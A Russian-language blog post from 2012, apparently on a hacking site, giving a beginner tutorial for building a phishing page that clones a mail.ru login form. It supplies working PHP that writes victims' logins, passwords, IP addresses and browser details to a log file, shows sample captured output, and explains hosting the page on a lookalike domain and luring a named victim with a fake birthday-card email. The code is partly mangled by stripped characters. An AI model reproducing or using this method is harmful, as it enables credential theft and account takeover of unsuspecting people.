|
|
 | |  |
| Главная » 2012 » Июль » 30 » Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут
03:42 Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут |
Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут. По шагам, все будет понятно даже для ламеров. Тут даже хтмл и пхп не нужно знать.
Заходим на страницу, которую мы пытаемся подделать (очевидно, это страница логина). Теперь нам нужно скачать ее. Делается двумя способами.
1 способ (ламерский). Нажимаем ctrl+s в браузере на этой странице (или в меню Файл - сохранить как... сохраняете страницу на своем кампе. Если после заливки на сервак не будут грузиться картинки - поправляйте (как это делать, я рассказывать не буду, ибо догадается даже олигофрен). Преимущества этого способа - все что нужно сделать, это нажать 3 кнопки и готово.
2 способ (чуть сложнее, но чище). Нажимаем ctrl+u (в лисе), ctrl+F3 (в опере) или в меню Вид - Исходный код страницы (в осле). Открывается окно с исходным кодом страницы. Этот код вы копируете в файл index.php или index.html. Потом прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака, страницу которого мы подделываем. Преимущества этого способа перед первым все чисто, все компактненько в одном файле.
Открываем блокнотом (или др. редактором исходного кода) ваш получившийся файл, ищем теги , имеющие отношение к форме логина (иногда на странице бывает несколько форм) и меняем значение аттрибута action на submit.php. Если вы не разбираетесь в HTML, найдите слово action и то, чему оно должно быть равно, установите submit.php (чтобы получилось примерно следующее action=submit.php). Сохраняем файл, закрываем.
В той же папке создаем файл submit.php и вписываем туда следующее содержимое
php @author hackersoft @copyleft 2009 @include 'config.php';$req=array( 'HTTP_REFERER'=$_SERVER['HTTP_REFERER'], 'HTTP_USER_AGENT'=$_SERVER['HTTP_USER_AGENT'], 'REMOTE_ADDR'=$_SERVER['REMOTE_ADDR'], 'REMOTE_PORT'=$_SERVER['REMOTE_PORT'], 'REQUEST_URI'=$_SERVER['REQUEST_URI'], 'REQUEST_TIME'=$_SERVER['REQUEST_TIME'],);$desc=fopen('logs.txt','at+');fwrite($desc,print_r($req,true).nnn.print_r($_REQUEST,true).nnn=====================nnn);fclose($desc);header('Location '.$loc);
затем сохраняем и закрываем.
Создаем файл config.php, и копируем в него текст
php @author hackersoft @copyleft 2009 куда редиректить после записи пароля$loc='httpmail.rucgi-binstart';
(не забудьте адрес поменять на нужный). Сохраняем и закрываем.
Создаем пустой файл logs.txt.
Ну вот, фейк готов, теперь его осталось залить и впарить жертве. Для этого регим акк на сайте httpfreehostia.com (бесплатный хостер с пхп без баннеров). Называем сайт как-нибудь типа mai1-ru-.freehostia.com.
Заливаем по FTP (или через панель управления) те файлы, которые вы создали.
Установите на файл logs.txt привилегии 777 (ибо пароль жертвы не запишется).
Теперь фейк можно впарить жертве. Напишите письмо вида
Привет маша! Поздравляю тебя с днем рождения и вручаю тебе эту открытку
httpmai1-ru-.freehostia.com
Маша зайдет на страницу httpmai1-ru-.freehostia.com и увидит форму ввода логина и пароля, как будто она разлогинелась. Если она глупая и ничего не заметит (а это уже отдельная тема, как фейк сделать менее палевным), она введет логин и пароль которые запишутся в файл logs.txt в следующем формате
Array( [HTTP_REFERER] = httphackersoft.ruadmin [HTTP_USER_AGENT] = Mozilla5.0 (Windows; U; Windows NT 5.1; ru; rv1.9.0.5) Gecko2008120122 Firefox3.0.5 [REMOTE_ADDR] = 92.112.88.666 [REMOTE_PORT] = 34953 [REQUEST_URI] = adminaction=articles [REQUEST_TIME] = 1230097894)Array( [login] = (здесь логин маши) [password] = (а здесь пароль))=====================
Вот и сказочке Escape, кто не понял - F1. Будут вопросы - оставляйте в теме, но я надеюсь что все написано так, что и ежу понятно.
p.s. Этот способ универсальный, подойдет не только для mail.ru или vkontakte.ru, а вообще, для чего угодно.
|
|
Категория: Сайты и способы их взлома. |
Просмотров: 744 |
Добавил: Maksis
| Рейтинг: 0.0/0 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ] | |
 | |  |
|
|
